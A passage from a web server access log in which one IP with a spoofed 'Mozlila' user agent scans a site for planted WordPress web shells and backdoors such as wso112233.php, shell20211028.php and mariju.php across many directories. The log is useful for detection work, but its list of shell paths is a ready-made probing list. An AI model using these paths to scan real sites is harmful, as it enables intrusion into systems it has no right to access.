/wp-includes/IXR/mariju.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:54 -0400] "GET /.well-known/acme-challenge/mariju.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:55 -0400] "GET /images/mariju.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:55 -0400] "GET /wp-includes/php-compat/mariju.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:55 -0400] "GET /wp-admin/maint/mariju.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:56 -0400] "GET /wp-includes/ID3/mariju.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:56 -0400] "GET /wp-admin/includes/mariju.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:56 -0400] "GET /.well-known/pki-validation/mariju.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:56 -0400] "GET /wp-includes/customize/mariju.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:57 -0400] "GET /wp-admin/network/mariju.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:57 -0400] "GET /wp-content/plugins/wp-help/admin/wp-fclass.php HTTP/1.1" 301 277 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:58 -0400] "GET /wp-content/plugins/wp-help/index.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:58 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:58 -0400] "GET /wp-content/updraft/themes.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:59 -0400] "GET /wp-content/themes/hideo/network.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:59 -0400] "GET /wp-admin/wp-apxupx.php?apx=upx HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:22:59 -0400] "GET /wp-apxupx.php?apx=upx HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:00 -0400] "GET /wp-content/plugins/wp-apxupx.php?apx=upx HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:00 -0400] "GET /wp-content/uploads/wp-apxupx.php?apx=upx HTTP/1.1" 301 271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:00 -0400] "GET /wp-content/wp-apxupx.php?apx=upx HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:01 -0400] "GET /wp-includes/wp-apxupx.php?apx=upx HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:01 -0400] "GET /wp-includes/wp-apxupx.php?apx=upx HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:02 -0400] "GET /.well-known/pki-validation/atomlib.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:02 -0400] "GET /images/atomlib.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:02 -0400] "GET /wp-admin/css/atomlib.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:02 -0400] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:03 -0400] "GET /wp-admin/includes/atomlib.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:03 -0400] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:03 -0400] "GET /wp-content/languages/themes/atomlib.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:04 -0400] "GET /wp-content/plugins/atomlib.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:04 -0400] "GET /wp-content/themes/atomlib.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:04 -0400] "GET /.well-known/acme-challenge/atomlib.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:05 -0400] "GET /.well-known/pki-validation/atomlib.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:05 -0400] "GET /atomlib.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:05 -0400] "GET /images/atomlib.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:06 -0400] "GET /wp-admin/css/atomlib.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:06 -0400] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:06 -0400] "GET /wp-admin/includes/atomlib.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:07 -0400] "GET /wp-admin/maint/atomlib.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:07 -0400] "GET /wp-content/languages/themes/atomlib.php HTTP/1.1" 301 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:07 -0400] "GET /wp-content/plugins/atomlib.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:07 -0400] "GET /wp-content/themes/atomlib.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:08 -0400] "GET /wp-includes/certificates/plugins.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:08 -0400] "GET /wp-admin/user/plugins.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:08 -0400] "GET /.well-known/acme-challenge/plugins.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:09 -0400] "GET /wp-includes/customize/plugins.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:09 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 264 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:09 -0400] "GET /wp-admin/css/colors/blue/plugins.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:10 -0400] "GET /wp-content/themes/plugins.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:10 -0400] "GET /wp-includes/ID3/plugins.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:10 -0400] "GET /wp-admin/css/plugins.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:11 -0400] "GET /wp-admin/includes/plugins.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:11 -0400] "GET /wp-admin/network/plugins.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:12 -0400] "GET /wp-admin/images/plugins.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:12 -0400] "GET /wp-admin/maint/plugins.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:12 -0400] "GET /wp-admin/images/plugins.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:13 -0400] "GET /wp-content/upgrade/plugins.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:13 -0400] "GET /images/plugins.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:14 -0400] "GET /css/plugins.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:14 -0400] "GET /wp-includes/fonts/plugins.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:14 -0400] "GET /wp-includes/pomo/plugins.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:15 -0400] "GET /.tmb/plugins.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:15 -0400] "GET /wp-includes/IXR/plugins.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:15 -0400] "GET /.well-known/pki-validation/plugins.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:15 -0400] "GET /cgi-bin/plugins.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:16 -0400] "GET /wp-includes/random_compat/plugins.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:16 -0400] "GET /wp-content/languages/plugins.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:16 -0400] "GET /wp.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:17 -0400] "GET /wp-content/uploads/wso112233.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:17 -0400] "GET /wp-content/wso112233.php HTTP/1.1" 301 255 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:18 -0400] "GET /wp-includes/wso112233.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:18 -0400] "GET /wp-admin/wso112233.php HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:18 -0400] "GET /wp-content/themes/wso112233.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:19 -0400] "GET /.well-known/shell20211028.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:19 -0400] "GET /.well-knownold/shell20211028.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:19 -0400] "GET /.well-known/acme-challenge/shell20211028.php HTTP/1.1" 301 275 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:20 -0400] "GET /.well-known/pkivalidation/shell20211028.php HTTP/1.1" 301 274 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:20 -0400] "GET /wp-content/plugins/shell20211028.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:21 -0400] "GET /wp-content/uploads/shell20211028.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:21 -0400] "GET /wp-content/shell20211028.php HTTP/1.1" 301 259 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:21 -0400] "GET /wp-includes/shell20211028.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:22 -0400] "GET /wp-admin/shell20211028.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:22 -0400] "GET /wp-content/themes/shell20211028.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:22 -0400] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:23 -0400] "GET /repeater.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:23 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 301 279 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:23 -0400] "GET /rindex.php?action=add HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:24 -0400] "GET /wp-mail.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:24 -0400] "GET /filefuns.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:24 -0400] "GET 